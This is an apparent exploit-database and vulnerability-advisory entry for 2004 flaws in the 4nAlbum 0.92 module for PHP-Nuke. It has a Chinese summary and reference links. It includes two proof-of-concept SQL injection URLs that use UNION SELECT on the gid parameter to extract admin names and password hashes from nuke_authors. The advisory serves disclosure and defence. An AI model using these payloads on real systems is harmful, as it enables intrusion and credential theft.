https://www.exploit-db.com/exploits/23816
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-067

PHP-Nuke6.5到7.0版本的4nalbum0.92存在SQL注入漏洞。远程攻击者借助gid参数获得特权或执行未经授权的数据库操作。

source: http://www.securityfocus.com/bid/9881/info
 
It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input.
 
There is an information disclosure issue with the 'displaycategory.php' script.
 
There is a remote file inclusion vulnerability in the 'displaycategory.php' script.
 
A cross-site scripting vulnerability in the 'nmimage.php' script has also been reported.
 
Finally an SQL injection vulnerability has been reported. This issue may be leveraged through the 'modules.php' script of phpNuke while requesting the 'index' file of the 4nAlbum module.
 
This issue has been reported to affect version 0.92 of the software. It is quite likely that other versions are affected as well.


http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*

来源:SECUNIA
名称:11134
链接:http://secunia.com/advisories/11134
来源:XF
名称:4nalbum-modulesphp-SQL-injection(15498)
链接:http://xforce.iss.net/xforce/xfdb/15498
来源:BID
名称:9881
链接:http://www.securityfocus.com/bid/9881
来源:OSVDB
名称:4294
链接:http://www.osvdb.org/4294
来源:BUGTRAQ
名称:20040315[waraxe-2004-SA#006-Multiplevulnerabilitiesin4nalbummoduleforPhpNuke]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107937780222514&w;=2